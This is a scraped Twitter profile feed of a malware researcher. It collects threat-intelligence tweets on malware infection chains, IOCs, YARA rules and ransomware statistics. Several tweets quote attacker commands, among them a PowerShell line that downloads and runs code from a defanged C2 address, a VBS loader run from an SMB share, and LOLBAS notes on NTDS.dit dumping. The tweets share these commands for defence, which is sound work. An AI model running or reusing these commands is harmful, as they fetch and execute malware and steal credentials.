Max_Malyutin(@Max_Mal_) 's Twitter Profileg
Max_Malyutin

@Max_Mal_

Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering.
“⚔️What do we say to God of malware, Not today⚔️”

ID:1066056357672030208

linkhttps://il.linkedin.com/in/max-malyutin-299689168 calendar_today23-11-2018 19:50:16

9,0K Tweets

10,7K Followers

302 Following

Florian Roth(@cyb3rops) 's Twitter Profile Photo

We decided to share our rules to scan for indicators of the exploitation of CVE-2024-3400 in 's PAN-OS with the community and included some of the generic rules (detect similar attacks)

Three Steps

1. Generate a Tech Support file and extract it

We decided to share our #YARA rules to scan for indicators of the exploitation of CVE-2024-3400 in #PaloAlto's PAN-OS with the community and included some of the generic rules (detect similar attacks) Three Steps 1. Generate a Tech Support file and extract it
account_circle
ExecuteMalware(@executemalware) 's Twitter Profile Photo

Here are IOCs from a 'RAT Hat Trick' from today. It started with a url in an email and ended up launching , and .

This was possibly the most convoluted malware campaign I've ever seen. 🙃

github.com/executemalware….

Here are IOCs from a 'RAT Hat Trick' from today. It started with a url in an email and ended up launching #xworm, #venomrat and #asyncrat. This was possibly the most convoluted malware campaign I've ever seen. 🙃 github.com/executemalware….
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript Invoice_818493.js wscript out.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll (1/3) 👇 IOC's github.com/pr0xylife/Wiki…
account_circle
ExecuteMalware(@executemalware) 's Twitter Profile Photo

Here are some IOCs from a sample that was analyzed on Friday. It seems to be but I could be mistaken.
github.com/executemalware…

Here are some IOCs from a sample that was analyzed on Friday. It seems to be #xloader #formbook but I could be mistaken. github.com/executemalware…
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- url > .zip > .js > CobaltStrike

Interesting campaign this week purporting to be Hays Recruitment.

DocuSign lure that leads to a site that drops a zip file that contains a .js loader for

(1/3)👇IOC's continued

#ISFB #LDR4 - url > .zip > .js > CobaltStrike Interesting campaign this week purporting to be Hays Recruitment. DocuSign lure that leads to a site that drops a zip file that contains a .js loader for #CobaltStrike (1/3)👇IOC's continued
account_circle
DarkFeed(@ido_cohen2) 's Twitter Profile Photo

🌐 Following the dissolution of group and the surge in Lockbit's attack rate, other groups have notably escalated their offensive 💨

➡️ On the last day Dragon Force, Black Basta, and Black Suit teams collectively accounted for approximately 28 new victims

🌐 Following the dissolution of #BlackCat group and the surge in Lockbit's attack rate, other #ransomware groups have notably escalated their offensive 💨 ➡️ On the last day Dragon Force, Black Basta, and Black Suit teams collectively accounted for approximately 28 new victims
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- .xls > smb > .vbs > .exe

EXCEL statapril2024.xlsx

wscript \\45.89.53.]187\s\AZURE_DOCUMENT.vbs

powershell -Command Invoke-Expression Invoke-RestMethod -Uri 103.124.106.]237/wctaehcw

AutoHotkey C:/kady/script.ahk

attrib +h C:/kady/

IOC's
github.com/pr0xylife/Dark…

#Darkgate - .xls > smb > .vbs > .exe EXCEL statapril2024.xlsx wscript \\45.89.53.]187\s\AZURE_DOCUMENT.vbs powershell -Command Invoke-Expression Invoke-RestMethod -Uri 103.124.106.]237/wctaehcw AutoHotkey C:/kady/script.ahk attrib +h C:/kady/ IOC's github.com/pr0xylife/Dark…
account_circle
Zscaler ThreatLabz(@Threatlabz) 's Twitter Profile Photo

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of .

Read our blog here: zscaler.com/blogs/security…

The source code for the IDA plugin can be found here: github.com/threatlabz/pik…

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of #Pikabot. Read our blog here: zscaler.com/blogs/security… The source code for the IDA plugin can be found here: github.com/threatlabz/pik…
account_circle
Max_Malyutin(@Max_Mal_) 's Twitter Profile Photo

New Infection 🚨

Exec Flow: VBS > PS > EXE (DLL SL)

[+] VBS T1059.005
[+] PS T1059.001
[+] DLL Side-Loading T1574.002

VBS exec fileless PS, the PS creates dir, downloads & exec next stage infection, uses DLL Side-Loading, and establishes a connection to C2

#DarkGate New Infection #TTPs🚨 #DFIR Exec Flow: VBS > PS > EXE (DLL SL) [+] VBS T1059.005 [+] PS T1059.001 [+] DLL Side-Loading T1574.002 VBS exec fileless PS, the PS creates dir, downloads & exec next stage infection, uses DLL Side-Loading, and establishes a connection to C2
account_circle
DarkFeed(@ido_cohen2) 's Twitter Profile Photo

🌐 Live Last Week Statistics DARKFEED.IO/LastWeek/ 🎯

➡️ TOP TARGETED COUNTRIES:
🇺🇸 United States: 47
🇮🇱 Israel: 6
🇩🇪 Germany: 6
🇮🇹 Italy: 4
🇬🇧 United Kingdom: 3
🇮🇳 India: 3
🇨🇦 Canada: 3

➡️ TOP TARGETED SECTORS:
Business Services: 24
HealthCare: 7
Financial: 6

🌐 Live Last Week #Ransomware Statistics DARKFEED.IO/LastWeek/ 🎯 ➡️ TOP TARGETED COUNTRIES: 🇺🇸 United States: 47 🇮🇱 Israel: 6 🇩🇪 Germany: 6 🇮🇹 Italy: 4 🇬🇧 United Kingdom: 3 🇮🇳 India: 3 🇨🇦 Canada: 3 ➡️ TOP TARGETED SECTORS: Business Services: 24 HealthCare: 7 Financial: 6
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

🏴‍☠️ Two powershell scripts used by possibly Turkish ransomware operators 🇹🇷 in January 2024, apparently were/are attacking MS-SQL servers to deploy and probably also .

▪ 'bytestream1.ps1': dc640a9e1594f9f4e18973b10944e1bf8188a8ad4457231d7fcd661d59e225bd (VT: 0/60)

🏴‍☠️ Two powershell scripts used by possibly Turkish ransomware operators 🇹🇷 in January 2024, apparently were/are attacking MS-SQL servers to deploy #Mimic and probably also #Trigona. ▪ 'bytestream1.ps1': dc640a9e1594f9f4e18973b10944e1bf8188a8ad4457231d7fcd661d59e225bd (VT: 0/60)
account_circle
Wietze(@Wietze) 's Twitter Profile Photo

Another milestone: 200 entries 💯💯

Recent additions:
🔥wbadmin (NTDS.dit dumping)
🔥winproj/msaccess (INetCache downloaders)
🔥appcert (proxy execution)
🔥tar (to/from ADS)
🔥te (arbitrary DLL loading)

Thanks Avihay Eldad, irEasty, Nir Chako & others for contributing

Another #LOLBAS milestone: 200 entries 💯💯 Recent additions: 🔥wbadmin (NTDS.dit dumping) 🔥winproj/msaccess (INetCache downloaders) 🔥appcert (proxy execution) 🔥tar (to/from ADS) 🔥te (arbitrary DLL loading) Thanks @AvihayEldad, irEasty, @C_h4ck_0 & others for contributing
account_circle
Germán Fernández(@1ZRR4H) 's Twitter Profile Photo

🕷️ Obfuscated Javascript (raw.githubusercontent.com/CronUp/EnAnali…) leads to via 'slack.msi' file at \\wireoneinternet.info@80\share\ (WebDAV)
+ bazaar.abuse.ch/sample/b9dbe96…

+ 18 JavaScript payloads at \\wireoneinternet.info@80\colt\ 🧐

C2 already reported:

🕷️ Obfuscated Javascript (raw.githubusercontent.com/CronUp/EnAnali…) leads to #Latrodectus via 'slack.msi' file at \\wireoneinternet.info@80\share\ (WebDAV) + bazaar.abuse.ch/sample/b9dbe96… + 18 JavaScript payloads at \\wireoneinternet.info@80\colt\ 🧐 C2 already reported:
account_circle
Wesley(@wesleyneelen) 's Twitter Profile Photo

Protect your Microsoft 365 tenant against (AITM) phishing attacks. Warn your users whenever they are targeted.

Installed in a few minutes 👇

account_circle